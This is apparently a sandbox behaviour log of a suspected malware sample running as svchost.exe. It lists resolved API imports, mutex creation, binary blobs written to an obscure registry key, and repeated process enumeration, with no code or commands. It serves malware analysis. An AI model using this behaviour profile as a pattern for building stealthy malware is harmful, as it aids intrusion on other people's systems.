Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x757b05ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x757a787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x757b0b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x757ab17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x757b6110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x757ad156 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x757af350 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x757a9a55 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x758d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x758e6c0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x758dd718 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x756f469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x756f45f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7570779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x756f0e0c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x756f40e6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x756f0e24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x756f2a66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x756f40fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x756ec54a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x756e9fe2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x756ef4fd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x756edf4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x756edf36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x756f4680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x756f14d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x756edf66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x756f4304 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x756f412e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x756f4620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x756f468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x756ec532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x756f1f59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x756f432c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x756f46ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x756ee124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x756f431c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x756ec51a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x756f418e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x756f415e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x756f4608 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x756f41b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x756f413b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x756ecf31 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7570773f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x756ee15b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x756f46e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x756f445b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7573db3a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x756edf14 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75c50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75c63c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75c71e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75cd5708 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x750e45bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x750e55bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x7510cd81 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x750e4745 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x7510d32a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x750e46e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x750e86f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x750ec39c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x750e3248 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x750ec177 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x7511066c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x750e5331 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x750ffbf5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x750ea1b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x750dfcca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x750fedfe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x750dff07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x750e5c62 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x750fc6fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x7510ce21 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x74eb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x74eb13f0 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x7546e599 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x754909ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x7547363b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75465ea5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75499d0b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x754986d3 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x75145689 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75144de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7514e743 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x751454f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x75144f70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x75145f49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x75145ea6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x751458b3 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x753749e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x7536b406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x7536a33e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75361b56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75374c7d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x7535d075 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x753675e8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x7537f18e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7536ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x753e18f8 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x76c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x76c71d76 True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x76b60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b63eae True 1
Fn
Module Load module_name = Secur32.dll, base_address = 0x748e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x74dea415 True 1
Fn
System Get Info type = Operating System True 2
Fn
Module Get Filename process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260 True 1
Fn
Mutex Create mutex_name = 20BC29E135FB9B01285187E3B5593CC8 True 1
Fn
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\xeyzlap, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\giilemz, type = file_attributes False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Thread 0x970
(Host: 1764, Network: 0)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77270000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x7728fda0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
